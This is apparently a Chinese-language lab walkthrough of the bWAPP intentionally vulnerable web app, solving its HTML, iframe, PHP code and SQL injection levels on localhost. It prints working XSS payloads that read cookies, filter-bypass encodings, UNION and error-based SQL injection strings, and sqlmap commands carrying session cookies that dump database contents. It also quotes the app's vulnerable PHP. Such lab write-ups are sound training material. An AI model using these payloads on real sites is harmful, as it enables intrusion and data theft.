bWAPP
- HTML Injection - Reflected (GET)
- HTML Injection - Reflected (POST)
- HTML Injection - Reflected (URL)
- HTML Injection - Stored (Blog)
- iFrame Injection
- PHP Code Injection
- SQL Injection (GET/Search)
- SQL Injection (GET/Select)
- SQL Injection (POST/Search)
- SQL Injection (POST/Select)
- SQL Injection (AJAX/JSON/jQuery)
- SQL Injection - Stored (Blog)
- SQL Injection - Stored (SQLite)
- SQL Injection - Stored (User-Agent)
- SQL Injection - Blind - Boolean-Based
- SQL Injection - Blind - Time-Based
HTML Injection - Reflected (GET)
low
先随便输入,查看回显
继续测试,输入First name:<p>111</p>; Last name:1
查看回显,说明代码被解析
尝试输入js代码First name:<script>alert(document.cookie)</script>; Last name:1
出现弹窗,获得cookie
medium
尝试输入js代码First name:<script>alert(document.cookie)</script>; Last name:1
可以看到没有被解析,查看源码发现尖括号被替换了
我们尝试将尖括号编码,输入%3cscript%3ealert(document.cookie)%3c/script%3e
,弹窗成功
high
输入<script>alert(document.cookie)</script>
,发现没有被解析
抓包查看,发现尖括号和圆括号均被编码了
查看源码
function xss_check_3($data, $encoding = "UTF-8")
{
// htmlspecialchars - converts special characters to HTML entities
// '&' (ampersand) becomes '&'
// '"' (double quote) becomes '"' when ENT_NOQUOTES is not set
// "'" (single quote) becomes ''' (or ') only when ENT_QUOTES is set
// '<' (less than) becomes '<'
// '>' (greater than) becomes '>'
return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
可以看到预定义的字符都被转换为实体,安全
HTML Injection - Reflected (POST)
与上一关一样,传参方式由GET改为POST
HTML Injection - Reflected (URL)
low
尝试在url中构造语句
尝试在URL栏里直接构造xss,可以看到<>尖括号被编码了
尝试通过抓包修改URL,成功
menium&high
查看源码
switch($_COOKIE["security_level"])
{
case "0" :
// $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
break;
case "1" :
$url = "<script>document.write(document.URL)</script>";
break;
case "2" :
$url = "http://" . $_SERVER["HTTP_HOST"] . xss_check_3($_SERVER["REQUEST_URI"]);
break;
default :
// $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
break;
}
安全,无法绕过
HTML Injection - Stored (Blog)
low
随便输入,查看回显
输入<h1>111</h1>
,查看回显,可以看到代码被解析了
输入<script>alert(document.cookie)</script>
,成功弹窗,获得cookie
menium&&high
查看源码
switch($_COOKIE["security_level"])
{
case "0" :
$data = sqli_check_3($link, $data);
break;
case "1" :
$data = sqli_check_3($link, $data);
// $data = xss_check_4($data);
break;
case "2" :
$data = sqli_check_3($link, $data);
// $data = xss_check_3($data);
break;
default :
$data = sqli_check_3($link, $data);
break;
}
function sqli_check_3($link, $data)
{
return mysqli_real_escape_string($link, $data);
}
mysqli_real_escape_string()
转义sql语句中使用字符串中的特殊字符
iFrame Injection
IFRAME是HTML标签,作用是文档中的文档,或者浮动的框架(FRAME)。iframe元素会创建包含另外一个文档的内联框架(即行内框架)。
查看源码
function xss($data)
{
switch($_COOKIE["security_level"])
{
case "0" :
$data = no_check($data);
break;
case "1" :
$data = xss_check_4($data);
break;
case "2" :
$data = xss_check_3($data);
break;
default :
$data = no_check($data);
break;
}
function xss_check_3($data, $encoding = "UTF-8")
{
// htmlspecialchars - converts special characters to HTML entities
// '&' (ampersand) becomes '&'
// '"' (double quote) becomes '"' when ENT_NOQUOTES is not set
// "'" (single quote) becomes ''' (or ') only when ENT_QUOTES is set
// '<' (less than) becomes '<'
// '>' (greater than) becomes '>'
return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
function xss_check_4($data)
{
// addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
// These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
// Do NOT use this for XSS or HTML validations!!!
return addslashes($data);
}
low
直接修改ParamUrl:http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=https://www.baidu.com&ParamWidth=250&ParamHeight=250
menium
查看源码
function xss_check_4($data)
{
// addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
// These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
// Do NOT use this for XSS or HTML validations!!!
return addslashes($data);
在php中,addslashes()函数是对输入字符串中的某些预定义字符前添加反斜杠;
if($_COOKIE["security_level"] == "1" || $_COOKIE["security_level"] == "2")
{
?>
<iframe frameborder="0" src="robots.txt" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php
else
{
?>
<iframe frameborder="0" src="<?php echo xss($_GET["ParamUrl"])?>" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php
}
?>
直接修改ParamUrl的值时,页面没反应,现在尝试从后面着手。根据上面的代码可猜测,在width后面插入</iframe>
将前面的闭合,然后插入xss
http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250"></iframe><script>alert(/xss/)</script>&ParamHeight=250
high
查看源码
function xss_check_3($data, $encoding = "UTF-8")
{
// htmlspecialchars - converts special characters to HTML entities
// '&' (ampersand) becomes '&'
// '"' (double quote) becomes '"' when ENT_NOQUOTES is not set
// "'" (single quote) becomes ''' (or ') only when ENT_QUOTES is set
// '<' (less than) becomes '<'
// '>' (greater than) becomes '>'
return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
htmlspecialchars会将预定义的字符(&,’,",<,>)转换为 HTML 实体,无法过滤,是安全的。
PHP Code Injection
low
点击masage后,出现test
URL从http://127.0.0.1/bWAPP/bWAPP/phpi.php
变成http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=test
,改变一下massage的值为:http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=phpinfo()
后出现PHP版本信息
<div id="main">
<h1>PHP Code Injection</h1>
<p>This is just a test page, reflecting back your <a href="<?php echo($_SERVER["SCRIPT_NAME"]);?>?message=test">message</a>...</p>
<?php
if(isset($_REQUEST["message"]))
{
// If the security level is not MEDIUM or HIGH
if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
{
?>
<p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>
//low级别直接输出massage
<?php
}
// If the security level is MEDIUM or HIGH
else
{
?>
<p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");;?></i></p>
<?php
}
}
?>
</div>
查看源代码,发现low级别直接输出massage,menium或者high级别使用htmlspecialchars函数
SQL Injection (GET/Search)
low
' or 1=1 --
' order by 7 --
' union select1,2,3,4,5,6,7 --
:2,3,4,5有回显
' union select 1,user(),database(),4,5,6,7 --
SQL Injection (GET/Select)
low
movie=1 and 1=1 &action=go
回显正常movie=1 and 1=2 &action=go
报错movie=1 order by 7 &action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go
,查看回显位置为2,3,4,5
movie=0 union select 1,user(),database(),4,5,6,7 &action=go
menium&high
查看源码
function sqli($data)
{
switch($_COOKIE["security_level"])
{
case "0" :
$data = no_check($data);
break;
case "1" :
$data = sqli_check_2($data);
break;
default :
$data = no_check($data);
break;
}
function sqli_check_1($data)
{
return addslashes($data);
}
function sqli_check_2($data)
{
return mysql_real_escape_string($data);
}
整数型注入, 对于字符型注入的防御策略并不起作用:
同low
SQL Injection (POST/Search)
low
同SQL Injection (GET/Search)
menium&high
switch($_COOKIE["security_level"])
{
case "0" :
$data = no_check($data);
break;
case "1" :
$data = sqli_check_1($data);
break;
case "2" :
$data = sqli_check_2($data);
break;
default :
$data = no_check($data);
break;
}
function sqli_check_1($data)
{
return addslashes($data);
}
function sqli_check_2($data)
{
return mysql_real_escape_string($data);
}
分别用了addslashes()和mysql_real_escape_string()函数防御:
SQL Injection (POST/Select)
low
movie=1 and 1=1 &action=go
movie=1 order by 7&action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go
movie=0 union select 1,user(),database(),4,5,6,7 &action=go
SQL Injection (AJAX/JSON/jQuery)
简介
AJAX是一种用于创建快速动态网页的技术。通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。
AJAX = 异步 JavaScript 和 XML
low
<script>
$("#title").keyup(function(){
// Searches for a movie title
var search = {title: $("#title").val()};
// AJAX call
$.getJSON("sqli_10-2.php", search, function(data){
init_table();
// Constructs the table from the JSON data
var total = 0;
$.each(data, function(key, val){
total++;
$("#table_yellow tr:last").after("<tr><td>" + val.title + "</td><td align='center'>" + val.release_year + "</td><td>" + val.main_character + "</td><td align='center'>" + val.genre + "</td><td align='center'><a href='http://www.imdb.com/title/" + val.imdb + "' target='_blank'>Link</a></td></tr>");
});
// Empty result
if (total == 0)
{
$("#table_yellow tr:last").after("<tr height='30'><td colspan='5' width='580'>No movies were found!</td></tr>");
}
})
});
SQL Injection - Stored (Blog)
存储型xss
low
-
先尝试输入
<h>11111</h>
,发现有回显 -
尝试输入js语句
<script>alert(/xss/)</script>
成功跳出弹窗 -
查看源码,看到有以下三个参数
-
代码审计:
if(isset($_POST["blog"]))//如果blog通过post传参后有值 { $entry = sqli($_POST["entry"]);//此时传参进来的值赋给entry $owner = $_SESSION["login"]; if($entry == "") { $message = "<font color=\"red\">Please enter some text...</font>"; } else { //此时新增加的三个blog的值(一一对应) $sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')"; $recordset = $link->query($sql); if(!$recordset) { die("Error: " . $link->error . "<br /><br />"); } // Debugging // echo $sql; $message = "<font color=\"green\">The entry was added to our blog!</font>"; } }
burpsuite抓包,然后右键send to repeater
给参数entry赋值为1'
,看到有SQL的报错,说明这里是存在SQL注入的
注意这行代码$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";
尝试输入entry=1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#&blog=add
其中1'
与之前的时间data()
闭合;(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP')
是一个整体,赋值给entry
; 这之后的一个右括号)
与VALUES的左括号闭合,这个时候
页面回显成功,说明注入成功,然后用#
把后面的内容注释掉
medium&high
- 查看源码,发现使用了addslashes()函数,所以不能使用
""
function sqli_check_2($data) { return mysql_real_escape_string($data); } function sqli_check_3($link, $data) { return mysqli_real_escape_string($link, $data); }
- 尝试输入
<script>alert(/xss/)</script>
,回显成功。
SQL Injection - Stored (SQLite)
low
尝试输入js语句<script>alert(/xss/)</script>
,弹窗成功
查看源代码
if(isset($_POST["entry_add"]))
{
$entry = sqli($_POST["entry"]);
$owner = $_SESSION["login"];
if($entry == "")
{
$message = "<font color=\"red\">Please enter some text...</font>";
}
else
{
$db = new PDO("sqlite:".$db_sqlite);
$sql = "SELECT max(id) as id FROM blog;";
$recordset = $db->query($sql);
$row = $recordset->fetch();
$id = $row["id"];
$sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" . ++$id . ",'" . date('Y-m-d', time()) . "','" . $entry . "','" . $owner . "');";
$db->exec($sql);
$message = "<font color=\"green\">The entry was added to our blog!</font>";
}
}
SQL Injection - Stored (User-Agent)
low
点击download,可以查看日志
查看源码
$ip_address = $_SERVER["REMOTE_ADDR"];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
// Writes the entry into the database
$sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), '" . sqli($user_agent) . "', '" . $ip_address . "')";
$recordset = $link->query($sql);
if(!$recordset)
{
die("Error: " . $link->error);
}
// Writes the entry into a text file
$line = "'" . date("y/m/d G.i:s", time()) . "', '" . $ip_address . "', '" . xss($user_agent) . "'" . "\r\n";
$fp = fopen("logs/visitors.txt", "a");
fputs($fp, $line, 200);
fclose($fp);
// Selects all the records
$sql = "SELECT * FROM visitors ORDER by id DESC LIMIT 3";
$recordset = $link->query($sql);
if(!$recordset)
{
die("Error: " . $link->error);
}
抓包,修改User-Agent
输入1'
,发现报错
User-Agent:1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#
SQL Injection - Blind - Boolean-Based
low
布尔盲注' or 1=1 #
利用sqlmap工具的使用点这里
-
先利用burpsuite获取cookie
-
获取数据库信息:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs
-
获取当前数据库名称
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --current-db
-
查看数据库中的所有表
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp --tables
-
查看bwapp数据库的movies表中所有的字段
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies --columns
-
查看movies表中的id字段的所有信息
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies -C genre --dump
(扫的时间太长,不扫了)
medium
使用addslashes()
函数:
addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
预定义字符是:
单引号(')
双引号(")
反斜杠(\)
NULL
提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。
注释:默认地,PHP 对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。
所以您不应对已转义过的字符串使用 addslashes(),因为这样会导致双层转义。
遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。
安全
high
使用mysql_real_escape_string()
函数:
转义 SQL 语句中使用的字符串中的特殊字符。
下列字符受影响:
\x00
\n
\r
\
'
"
\x1a
如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。
安全
SQL Injection - Blind - Time-Based
low
-
获取数据库信息:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_15.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs
利用sqlmap,跟上面步骤一样